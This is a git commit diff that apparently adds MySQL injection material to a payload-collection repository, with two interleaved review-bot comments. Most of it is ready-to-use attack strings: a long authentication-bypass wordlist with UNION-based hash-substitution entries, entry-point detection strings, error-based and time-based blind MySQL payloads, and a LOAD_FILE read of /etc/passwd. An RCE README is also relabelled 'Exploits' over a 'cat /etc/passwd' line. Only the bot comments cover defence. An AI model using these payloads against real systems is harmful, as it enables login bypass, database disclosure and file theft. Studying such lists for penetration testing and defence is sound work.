MySQL Payloads
parent
f452acf0c2
commit
c874dad3e9
|
@ -2,7 +2,7 @@
|
|||
Remote code execution is a security vulnerability that allows an attacker to execute codes from a remote server.
|
||||
|
||||
|
||||
## Vuln
|
||||
## Exploits
|
||||
Normal code execution
|
||||
```
|
||||
cat /etc/passwd
|
||||
|
|
|
@ -0,0 +1,77 @@
|
|||
'-'
|
||||
' '
|
||||
'&'
|
||||
'^'
|
||||
'*'
|
||||
' or ''-'
|
||||
' or '' '
|
||||
' or ''&'
|
||||
' or ''^'
|
||||
' or ''*'
|
||||
"-"
|
||||
" "
|
||||
"&"
|
||||
"^"
|
||||
"*"
|
||||
" or ""-"
|
||||
" or "" "
|
||||
" or ""&"
|
||||
" or ""^"
|
||||
" or ""*"
|
||||
or true--
|
||||
" or true--
|
||||
' or true--
|
||||
") or true--
|
||||
') or true--
|
||||
' or 'x'='x
|
||||
') or ('x')=('x
|
||||
')) or (('x'))=(('x
|
||||
" or "x"="x
|
||||
") or ("x")=("x
|
||||
")) or (("x"))=(("x
|
||||
or 1=1
|
||||
or 1=1--
|
||||
or 1=1#
|
||||
or 1=1/*
|
||||
admin' --
|
||||
admin' #
|
||||
admin'/*
|
||||
admin' or '1'='1
|
||||
admin' or '1'='1'--
|
||||
admin' or '1'='1'#
|
||||
admin' or '1'='1'/*
|
||||
admin'or 1=1 or ''='
|
||||
admin' or 1=1
|
||||
admin' or 1=1--
|
||||
admin' or 1=1#
|
||||
admin' or 1=1/*
|
||||
admin') or ('1'='1
|
||||
admin') or ('1'='1'--
|
||||
admin') or ('1'='1'#
|
||||
admin') or ('1'='1'/*
|
||||
admin') or '1'='1
|
||||
admin') or '1'='1'--
|
||||
admin') or '1'='1'#
|
||||
admin') or '1'='1'/*
|
||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
||||
admin" --
|
||||
admin" #
|
||||
admin"/*
|
||||
admin" or "1"="1
|
||||
admin" or "1"="1"--
|
||||
admin" or "1"="1"#
|
||||
admin" or "1"="1"/*
|
||||
admin"or 1=1 or ""="
|
||||
admin" or 1=1
|
||||
admin" or 1=1--
|
||||
admin" or 1=1#
|
||||
admin" or 1=1/*
|
||||
admin") or ("1"="1
|
||||
admin") or ("1"="1"--
|
||||
admin") or ("1"="1"#
|
||||
admin") or ("1"="1"/*
|
||||
admin") or "1"="1
|
||||
admin") or "1"="1"--
|
||||
admin") or "1"="1"#
|
||||
admin") or "1"="1"/*
|
||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
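Review bot: The two `UNION ALL SELECT` entries (the single-quote form and the double-quote form that closes the list) carry a fixed hex string that is the MD5 digest of the leading `1234`, and nothing in the file or the commit says so. Every line of this list is read as an entry, so the explanation belongs in the README that references the file, for example `The UNION entries assume a two-column result and an unsalted MD5 password column; 81dc9bdb52d04dc20036dbd8313ed055 is MD5("1234").` On the defending side, these entries only apply to a login routine that concatenates the username into the query and compares an unsalted MD5 in application code. The same README line should therefore name the fix: bound parameters and a salted password hash such as bcrypt or Argon2.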
|
@ -1,12 +1,58 @@
|
|||
# Title
|
||||
Lorem
|
||||
# SQL injection
|
||||
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
|
||||
|
||||
## Vuln
|
||||
## Exploit
|
||||
|
||||
Detection of an SQL injection entry point
|
||||
```
|
||||
Code
|
||||
'
|
||||
"
|
||||
%27
|
||||
" / %22
|
||||
; / %3B
|
||||
%%2727
|
||||
%25%27
|
||||
`+HERP
|
||||
'||'DERP
|
||||
'+'herp
|
||||
' ' DERP
|
||||
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
|
||||
transformed into U+0022 QUOTATION MARK (")
|
||||
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
|
||||
transformed into U+0027 APOSTROPHE (')
|
||||
```
|
||||
|
||||
|
||||
Authentication bypass - use the file "Authentication Bypass.txt"
|
||||
```
|
||||
SELECT id FROM users WHERE username='input1' AND password='input2'
|
||||
SELECT id FROM users WHERE username='' or true-- AND password='input2'
|
||||
```
|
||||
|
||||
|
||||
MySQL Error Based
|
||||
```
|
||||
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
||||
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
||||
```
|
||||
|
||||
|
||||
MySQL Blind SQL
|
||||
```
|
||||
+BENCHMARK(40000000,SHA1(1337))+
|
||||
```
|
||||
|
||||
|
||||
MySQL Read content of a file
|
||||
```
|
||||
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
||||
```
|
||||
|
||||
|
||||
Polyglot injection (multicontext)
|
||||
```
|
||||
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* Lorem
|
||||
* Ipsum
|
||||
* http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/
|
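Review bot: The `## Vuln` heading is left empty, and the authentication-bypass example shows the concatenated `SELECT id FROM users WHERE username='input1' AND password='input2'` without saying why it is injectable or how it is fixed. I would add one line under `## Vuln`, such as `The application builds the SQL string by concatenating client input; bind input1 and input2 as parameters of a prepared statement so they are always treated as data.` The detection fence also mixes test strings with a stray `Code` line and two prose sentences about U+02BA and U+02B9 being transformed into quote characters; those sentences read better as text outside the fence. The `Lorem` and `Ipsum` entries under `## Thanks to` look like template leftovers, though the rendered page does not show which lines are added and which are context.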